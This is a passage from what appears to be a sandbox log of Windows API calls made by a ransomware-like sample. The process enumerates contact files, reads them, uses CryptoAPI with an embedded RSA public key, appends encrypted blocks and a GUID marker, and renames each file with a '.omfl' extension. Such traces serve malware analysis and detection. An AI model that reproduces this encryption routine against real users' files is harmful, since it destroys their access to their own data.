hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.183] WriteFile (in: hFile=0x5c8, lpBuffer=0x757b558*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0x757b558*, lpNumberOfBytesWritten=0xe00fb14*=0x48e, lpOverlapped=0x0) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.183] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.183] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.183] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.183] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.183] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.184] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.184] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.184] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.184] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.184] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.184] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.184] CloseHandle (hObject=0x5c8) returned 1 [0130.190] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.190] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.190] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.omfl")) returned 1 [0130.191] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.191] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.191] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.192] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.192] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0130.192] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.192] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.192] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.192] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0130.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.194] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1177) returned 1 [0130.194] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.196] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.196] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.199] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.199] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x499, lpOverlapped=0x0) returned 1 [0130.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.199] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.200] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.200] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.200] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.200] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.200] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.201] SetLastError (dwErrCode=0x0) [0130.201] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.202] GetLastError () returned 0x0 [0130.202] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] GetLastError () returned 0x0 [0130.203] SetLastError (dwErrCode=0x0) [0130.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.203] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.204] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.204] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.204] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.204] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.204] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.204] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.204] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.204] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4a0) returned 0x757b558 [0130.204] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.204] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169b0 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a58 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a58 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a70 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.204] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.204] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a70 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16a58 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.205] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.206] GetCurrentThreadId () returned 0x618 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d53e0 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.206] GetCurrentThreadId () returned 0x618 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.206] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a58 [0130.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.207] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.208] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.208] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.208] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.208] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.208] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.208] CloseHandle (hObject=0x5c8) returned 1 [0130.209] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.omfl")) returned 1 [0130.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.210] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.212] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, 